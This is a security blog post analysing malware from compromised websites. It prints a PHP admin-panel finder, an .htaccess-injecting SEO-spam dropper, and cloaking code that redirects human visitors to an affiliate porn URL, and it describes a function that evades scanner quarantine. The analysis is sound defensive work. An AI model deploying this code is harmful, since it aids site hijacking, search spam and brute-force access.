Author: Luke Leal

There is often a misconception regarding the tools that attackers implement in their malicious activity, and that misconception is that they must be using advanced computer programs to target and exploit other computers.

This is not always true, and it is not uncommon to see simplistic tools used, such as the following:

This tool uses simple PHP coding to create an array of segmented URLs that are then appended to the domain name that is provided by the malicious user. It's commonly known as an admin finder as noted by the web page title (hacker group name removed).

if (isset($_POST["submit_lol"])) {
$url = $_POST['hash_lol'];
echo "<br /> COCOL ".$url."<br /><br />";
 
$adminlocales = array("/adminweb/index.php", "/adminsekolah", "/webmaster", "/operator", "/redaktur", "/moderator", "/login@web", "/admin@web", "/adminlogin", "/loginpanel", "/adminpanel", "/login@web", "/admin1.php", "/adminweb", "/Login",  "/login", "/redaktur", "/redakturweb", "/administrator", "/sika", "/develop", "/ketua", "/author", "/user", "/users",   "/dinkesadmin", "/retel", "/panel", "/paneladmin", "/panellogin", "/redaksi", "/cp-admin", "/master", "/master/index.php",    "/master/login.php", "/operator/index.php", "/sika/index.php", "/develop/index.php", "/ketua/index.php", "/redaktur/index.php",    "/admin/index.php", "/administrator/index.php", "/adminweb/index.php", "/user/index.php", "/users/index.php", "/dinkesadmin/index.php", "/retel/index.php", "/author/index.php", "/panel/index.php", "/paneladmin/index.php", "/panellogin/index.php", "/redaksi/index.php", "/cp-admin/index.php", "/operator/login.php", "/sika/login.php", "/develop/login.php",    "/ketua/login.php", "/redaktur/login.php", "/admin/login.php", "/administrator/login.php", "/adminweb/login.php");
     
foreach ($adminlocales as $admin){
$headers = get_headers("$url$admin");
if (eregi('200', $headers[0])) {
      echo "<a href='$url$admin'>$url$admin</a> >>> KETEMU GAN!<br />";
}
else {
      echo "$url$admin >>> GAK BISA GAN!<br />";
}
}
}

The coding behind the tool itself is almost as simple as the web page it displays. It just captures the domain name through a POST request sent via HTML form, assigns it to the $url variable, then uses a pre-set array of common admin segmented URLs through the $adminlocales variable, and combines the two to complete a full URL. Afterwards, it sends a request and if the request comes back with a valid HTTP "200 OK" code, then it outputs the URL with the Indonesian text "KETEMU GAN!" (I couldn't find an accurate translation, but I assume it's "URL GOOD"). If the web server returns anything other than "200 OK", then it outputs the "GAK BISA GAN!" text.

From there, attackers may use the results of the tool to gain access to administrator interfaces through brute force attempts.

All things considered, it's a very unsophisticated tool and could be much more efficient if run from a terminal with a proxy connection versus a compromised web server.

I was assisting a client with their compromised website and came across a file called unsave.php that was primarily used to inject a rewrite into the .htaccess file so that the SEO spam payload of the file goday.php could be delivered to certain visitors sent to the directory hosting these files:

{
 if ((filesize(".htaccess"))>100)
 {
 $out = fopen("../.htaccess", "w");
 fwrite ($out, "RewriteEngine On
 RewriteRule ^([A-Za-z0-9-]+).html$ goday.php?hl=$1 [L]");
 fclose($out); 
 }

The added RewriteRule will cause the web server to serve the goday.php file whenever a visitor sends a request for a .html file in this directory.

The goday.php file will then validate the incoming request based on the IP address, HTTP referrer, and the HTTP user-agent. The file itself looks to target certain keywords in order to alter their ranking, so it’s only interested in serving the SEO spam data to visitors that match its requirements for a search engine:

if (!strpos($_SERVER["HTTP_USER_AGENT"], "Googlebot")===false 
 || !strpos($_SERVER["HTTP_USER_AGENT"], "crawler")===false 
 || !strpos($_SERVER["HTTP_USER_AGENT"], "bot")===false 
 || !strpos($_SERVER["HTTP_USER_AGENT"], "yahoo")===false 
 || !strpos($_SERVER["HTTP_USER_AGENT"], "bot")===false)
{
 if ((filesize(".htaccess"))>100)
 {
 $out = fopen("../.htaccess", "w");
 fwrite ($out, "");
 fclose($out); 
 }
echo $page;
}
else
{header("Location: http://coolin[.]in/for/77?d=$d&mykeys=$mykeys&da=0910");
exit;
}

If the requisites are met, then the goday.php script sends the $page variable which contains a webpage that is generated on the fly. They are able to do this on-the-fly SEO keyword spam by having multiple templates that are just web pages that do not have any text on them until the goday.php script adds the keywords. Here is an example of one of the templates before it has been filled with the SEO keywords:

If the requisites aren’t met, the goday.php script will instead redirect the visitor to their affiliate/pay-per-click URL which ends up sending them to a pornographic website through their affiliate ID. They try to monetize the request either through SEO spam keyword rank boosting or by sending the visitor through their affiliate URL.

One of the interesting functions included in the injector file, unsave.php, was the following:

There are WordPress and other CMS plugins that scan website files and when they find a file that is deemed malicious then the plugin will append the “.suspected” text to the end of the filename so the file cannot continue to be executed through the browser. The function (shown above) demonstrates how a malicious user could take this into consideration and incorporate functions within their malware to automatically rename .suspected files when they are found. Then it would be able to circumvent the renaming of the file by the security plugin and continue serving the payload within the goday.php file.

If you need any help while dealing with issues similar to this one, don't hesitate to contact us. 🙂

This note is related to our recent blog post about a web spam infection via zip file upload